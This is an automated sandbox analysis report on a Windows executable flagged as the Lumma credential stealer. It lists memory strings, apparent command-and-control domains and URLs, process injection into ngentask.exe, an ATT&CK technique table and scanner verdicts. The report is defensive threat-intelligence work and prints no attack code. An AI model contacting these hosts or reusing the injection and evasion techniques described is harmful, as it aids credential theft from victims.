    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: resinedyw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: enlargkiw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: allocatinow.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: mathcucom.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: droppyrelivei.cfd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 401000
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 445000
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 448000
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 458000
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: EA6008
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Process created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F5A185 cpuid 0_2_00F5A185
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformation
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Queries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformation
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformation
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd VolumeInformation
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F59DD4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F59DD4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6D933 _free,GetTimeZoneInformation,_free,0_2_00F6D933
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: 1 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: 1 Virtualization/Sandbox Evasion; 311 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: 2 System Time Discovery; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 File and Directory Discovery; 33 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: 1 Screen Capture; 1 Archive Collected Data; 2 Clipboard Data; Input Capture; Keylogging
    Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
    Source | Detection | Scanner | Label | Link
    ceFgl3jkkk.exe | 45% | ReversingLabs | Win32.Spyware.Lummastealer |
    ceFgl3jkkk.exe | 100% | Avira | TR/AVI.Lumma.hwuxs |
    ceFgl3jkkk.exe | 100% | Joe Sandbox ML | |
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\_MEI8242\VCRUNTIME140.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\libcrypto-1_1.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\libffi-7.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pyd | 0% | ReversingLabs | |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://community.fastly.steamstatic.co | 0% | Avira URL Cloud | safe |
    https://community.fastly.steamstati | 0% | Avira URL Cloud | safe |
    https://marshal-zhukov.com/api) | 100% | Avira URL Cloud | malware |
    https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details | 0% | Avira URL Cloud | safe |
    https://www.ntcore.com/files/richsign.htm | 0% | Avira URL Cloud | safe |
    https://marshal-zhukov.com/apis | 100% | Avira URL Cloud | malware |
    droppyrelivei.cfd | 100% | Avira URL Cloud | malware |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    steamcommunity.com | 104.102.49.254 | true | false | | high
    s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
    marshal-zhukov.com | 188.114.97.3 | true | false | | high
    droppyrelivei.cfd | unknown | unknown | true | | unknown
    condifendteu.sbs | unknown | unknown | true | | unknown
    allocatinow.sbs | unknown | unknown | true | | unknown
    vennurviot.sbs | unknown | unknown | true | | unknown
    drawwyobstacw.sbs | unknown | unknown | true | | unknown
    mathcucom.sbs | unknown | unknown | true | | unknown
    ehticsprocw.sbs | unknown | unknown | true | | unknown
    resinedyw.sbs | unknown | unknown | true | | unknown
    enlargkiw.sbs | unknown | unknown | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    droppyrelivei.cfd | true | Avira URL Cloud: malware | unknown
    https://steamcommunity.com/profiles/76561199724331900 | false | | high
    resinedyw.sbs | false | | high
    enlargkiw.sbs | false | | high
    allocatinow.sbs | false | | high
    drawwyobstacw.sbs | false | | high
    vennurviot.sbs | false | | high
    ehticsprocw.sbs | false | | high
    mathcucom.sbs | false | | high
    condifendteu.sbs | false | | high
    https://marshal-zhukov.com/api | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547815675.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.ntcore.com/files/richsign.htm | ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548099724.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details | ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://www.python.org/download/releases/2.3/mro/. | ceFgl3jkkk.exe, 00000002.00000003.1506886633.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1506725417.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547469415.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
    http://ocsp.thawte.com0 | ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr | false | | high
    http://store.steampowered.com/privacy_agreement/ | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.co | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://marshal-zhukov.com/api) | ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://www.python.org/dev/peps/pep-0205/ | ceFgl3jkkk.exe, 00000000.00000003.1503202450.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548042408.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
    http://store.steampowered.com/subscriber_agreement/ | ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://python.org/dev/peps/pep-0263/ | python39.dll.0.dr | false | | high
    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://crl3.digi | ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js? | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://marshal-zhukov.com/apis | ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://community.fastly.steamstatic.com/public/im | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://crl.thawte.com/ThawteTimestampingCA.crl0 | ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr | false | | high
    https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=id | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.openssl.org/H | ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr | false | | high
    https://marshal-zhukov.com/ | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstati | ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://store.steampowered.com/account/cookiepreferences/ | ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://crl4.digice | ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.mandiant.com/resources/blog/tracking-malware-import-hashing | ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://store.steampowered.com/legal/ | ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    188.114.97.3 | marshal-zhukov.com | European Union | | 13335 | CLOUDFLARENETUS | false
    104.102.49.254 | steamcommunity.com | United States | | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560168
Start date and time: 2024-11-21 13:44:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor-based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ceFgl3jkkk.exe (renamed because the original name is a hash value)
Original Sample Name: 857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@5/21@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 72
• Number of non-executed functions: 169
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 40.126.32.72, 40.126.32.133, 20.190.160.22, 40.126.32.134, 40.126.32.136, 20.190.160.17, 20.190.160.20, 40.126.32.76, 52.182.143.212
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: ceFgl3jkkk.exe
| Time | Type | Description |
|---|---|---|
| 07:45:21 | API Interceptor | 7x Sleep call for process: ngentask.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/ |
| | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/ |
